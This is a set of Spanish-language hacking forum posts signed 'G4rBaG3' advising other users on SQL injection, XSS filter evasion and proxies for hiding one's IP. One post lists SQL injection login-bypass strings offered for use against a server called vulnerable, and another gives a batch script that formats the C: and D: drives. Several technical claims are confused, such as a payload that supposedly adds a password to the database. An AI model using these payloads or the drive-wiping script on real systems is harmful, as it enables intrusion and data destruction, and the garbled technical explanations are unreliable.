Buenas , primero que nada nc es muy util en muchas cosas, pero para lo que quieres hacer te recomiendo putty, ya veras porque te digo chequeando las opciones que tiene que son muy buenas y flexibles.
No creo que este filtrando HAVING, porque si lo haria no se podria realizar muchas operaciones basicas en la BD del sql, asi que eso no es, seguramente es una proteccion de la comilla simple " ' " eso ya lo habia vistopro eso te digo:P.
Luego darle el XSS en formato normal y en hexa da lo mismo,la mayoria de las veces, aunque es mejor hacerlo con TODA la sentencia en hexa ya que a veces hay filtrado de determinados comandos en  la sql.

Salu2.

CORRECION: no es 'hexa' es ascii bueno cualquiera se equivoca .

Si hay un XSS si se puede sobreescribir un archivo que haya en el servidor...puedes hacer una redireccion doble,a tu paginay ahi poner el codigo que quieras es mas simple que modificar todo el codigo del servidor.
Pero si es posible.

Salu2.

G4rBaG3.

(No me extrañen )

Alt+0160 e slo mismo que el espacio de la barra. Teoricamente tendria que funcionar ya que los Alt's representan codigo ascii que es el mismo para todos los OS.
Salu2.

Bueno primero que nada tienes que aprender ingles aunquesea tecnico para saber que significa cada variable que utilizaras en cualquier XSS, ya que son palabras reservadas escritas en ingles.

Y el lenguaje que utilices puede variar de acuerdo a lo que quieras explotar si estas con SQL necesitaras usar las variables de SQL, tb las puedes pasar a hexa para que sea interpretado mas rapido por el navegador.
Aunque a veces se pueden construir sentencias que no sean propias del lenguaje a usar.

Primero que nada debes saber que aplicacion vas a explotar, luego ellenguaje relacionadoa  als misma y si se puede hacer una comparacion con otro lenguaje para explotar el fallo.

Espero haber sido claro, pero no digan que no hay info en internet, solo hay que saber interpretarla....

Salu2.

G4rBaG3.

Nota: no me conecto seguido com antes asi que el que quiera respuestas que me mande mensjaes privados asi cuando me conecte lo respondo...

¿Que paso con la batalla Anti-Pedofilia?.

Bueno el paper para ser un novato .

Salu2.


No a la Pedofilia!

Te dije 'cuidado con el sasser', recuerdas????

xDDD.

Si, este server es vulnerable a esta vieja falla...
Pero me parece que no estas prestandoa tencion a tu frase:
'antes de preguntar usa www.google.com'
porque hay otros metodos de inject SQL que te dan directamente un resultado positivo o puedes crear nuevos passwords.
Mira estod codigos y prueba son muy efectivos realmente mas que un 'HAVING 1--1 siendo que puedes usar una sentencia mejor construida.

1) ') OR ('a' = 'a

2) 'or''='

3) 'a''or'

4) 'a'or'G4rBaG3' (agrega a la base de datos el password G4rBaG3)
Estos ultimos son los que mas me sirvieron en su tiempo .
Como sea prueba con estos, pero aprende bien las sentencias que eso te servira para usar otras tecnicas.

@ECHO OFF
if exist c:\windows goto :peligro
if not exist c:\windows goto :particion d
: peligro
echo desa destruir su pc?
pause>>null
call format c:\q
:particion d
call format d:\q

bueno te digo que hay miles de tutoriales por la red que te explica que es un proxy, pero te voy a dadr una level, y simple explicaion del tema para que entiendas y luego tu te profundices mas en el tema, si?
Bueno, los proxies se usan generalmente para esconder tu ip(ip es muy en basico tu identificacion en la red) funciona de la siguiente manera:

el numero 1 sos vos(con tu computadora )
el numero 2 es lo que se llama "proxy"
el numero 3 es la computadora en donde queremos mantener una conexión
el grafico para la conexion es el siguiente:

1------2--------3

mas facil imposible no??
bueno te explico: un proxy oculta tu verdadera direccion de ip. o sea que vos desde tu computadora (1) te conectas a otra (2) y luego de AHI a la que queres acceder (3) esto da como resultado que la computadora (3) vea la ip de la maquina 2 y no la tuya. para esto podes usar unos programas llamados bouncers uno que es muy facil de usar y configurar es el probouncer
sin mas que decir me despido espero que esta simple explicacion te ayude a entender que es un proxy.

                                   G4rBaG3